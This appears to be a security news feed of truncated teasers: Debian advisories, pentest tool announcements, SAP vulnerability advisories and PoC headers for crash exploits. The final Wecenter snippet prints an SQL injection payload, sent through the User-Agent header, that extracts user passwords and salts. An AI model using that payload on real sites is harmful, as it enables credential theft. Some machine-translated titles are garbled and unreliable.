Simple Fingerprint Test is Enough to Know Cocaine Use

If you are one of those using cocaine, law enforcement officials may soon catch you by simply examining your fingerprints. Scientists have developed a new type of drug test that can tell whether you have taken cocaine by analyzing chemical traces left behind in your fingerprint. A team of...

Datapp Sniffs Out Unencrypted Mobile Data

Last fall, researchers at the University of New Haven’s Cyber Forensics Research and Education Group dropped the hammer on a number of Android apps, including those from some popular social networking and dating sites, for their insistence on sending data in the clear. Pretty quickly, the UNHcFRE...

[SECURITY] [DSA 3256-1] libtasn1-6 security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3256-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso May 10, 2015 http://www.debian.org/security/faq -...

DSA-3256-1 libtasn1-6 - security update

Bulletin has no description...

Autorize - Automatic Authorization Enforcement Detection (Extension for Burp Suite)

Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert at AppSec Labs. Autorize was designed to help security testers by performing automatic authorization tests. Installation 1. Download Burp...

SAP MII - Encryption Downgrade vulnerability

Application: SAP MII Vendor URL: http://www.sap.com Bugs: Cryptographic issues Reported: 05.09.2015 Vendor response: 06.09.2015 Date of Public Advisory: 20.11.2015 Reference: SAP Security Note 2240274 Author: Mathieu GELI ERPScan VULNERABILITY INFORMATION Class: Cryptographic issues Impact: readi...

[SECURITY] [DSA 3242-1] chromium-browser security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3242-1 [email protected] http://www.debian.org/security/ Michael Gilbert April 30, 2015 http://www.debian.org/security/faq -...

Web Application Security Scanner Framework: Arachni

Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of modern web applications. It is free, with its source code public and available for review. It is multi-platform, supporting all major operating...

DSA-3242-1 chromium-browser - security update

Bulletin has no description...

DSA-3239-1 icecast2 - security update

Bulletin has no description...

i.FTP 2.21 - Overflow Crash (SEH) (PoC)

i.FTP 2.21 - Overflow Crash SEH PoC iFTP 2.21 SEH overwritten Crash PoC Author: Avinash Kumar Thapa "-Acid" Date of Testing : 28th April'2015 Vendor's home page: http://www.memecode.com/iftp.php Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe Crash Point: Go to Schedule Schedule...

UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC

Exploit for windows platform in category dos / poc Exploit Title: UniPDF v1.2 BufferOverflow, SEH overwrite DoS PoC Author : Avinash Kumar Thapa "-Acid" Date of Testing : 25th April 2015 Tested On : Windows XP- Service Pack 3 && Windows 7 Home Basic Vendor Homepage: http://unipdf.com/ Software...

Ubuntu aeration local elevation of privilege vulnerability, the impact 1 2. 0 4 – 14.10 version-bug warning-the black bar safety net

Today Ubuntu12. 04-14. 1 0 exposure of local privilege elevation vulnerability the vulnerability by Google, the God of Tavis Ormandy sent that contains the exploit test program. Vulnerability class: High-risk The scope of the impact Ubuntu Precise 12.04 LTS of Ubuntu Trusty 14.04 LTS and Ubuntu...

SAP NetWeaver 7.4 - XXE

Application: SAP NetWeaver Portal 7.4 Vendor URL: http://www.sap.com Bugs: XML eXternal Entity Reported: 16.04.2015 Vendor response: 17.04.2015 Date of Public Advisory: 11.08.2015 Reference: SAP Security Note 2168485 Authors: Roman Bezhan ERPScan VULNERABILITY INFORMATION Class: XML External Enti...

OWASP ZAP 2.4.0 - Penetration Testing Tool for Testing Web Applications

ZAP is an OWASP Flagship project, and is currently the most active open source web application security tool. For a quick introduction to the new release see this video: Some of the most significant changes include: ‘Attack’ Mode A new ‘attack’ mode has been added that means that applications tha...

Cybrary Offers Free Online Ethical Hacking and Cyber Security Training

I frequently receive emails and messages on how to hack my friend’s Facebook account, how to become a hacker, how to penetrate networks, how to break into computers, and how to compromise routers? These are some of the most frequent queries I came across, and in this article I’ll attempt to answe...

Commix - Automated All-in-One OS Command Injection and Exploitation Tool

Commix short for command injection exploiter has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, ...

PHP arbitrary file upload Vulnerability, CVE-2 0 1 5-2 3 4 8 analysis-vulnerability warning-the black bar safety net

Last night security news broke of a“PHP arbitrary file upload Vulnerability”, CVE number: CVE-2 0 1 5-2 3 4 8 in. At the time landlord is ready to pack up and go home, see this news my heart a surprised: the lost rivers and lakes for many years the 0 character truncation upload vulnerability and...

Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit Title: FiyoCMS Multiple Vulnerabilities Date: 29 March 2015 Exploit Author: Mahendra Vendor Homepage: www.fiyo.org Software Link: http://sourceforge.net/projects/fiyo-cms/ Version: 2.0.1.8, other version might be vulnerable. Tested :...

Wecenter最新版注入之二（黑盒测试技巧）

简要描述： 无视GPC注入 详细说明： 设置useragent 注入语句为 ' andselect 1 fromselect count,concatselect concatpassword,0x23,salt,0x23 from awsusers limit 0,1,floorrand02x from informationschema.tables group by xa 然后挂着页面几分钟 再去访问任意页面就可以了 可以看到报错了 Database error ------ SQL: UPDATE awsusersonline SET uid = '2', lastactive ...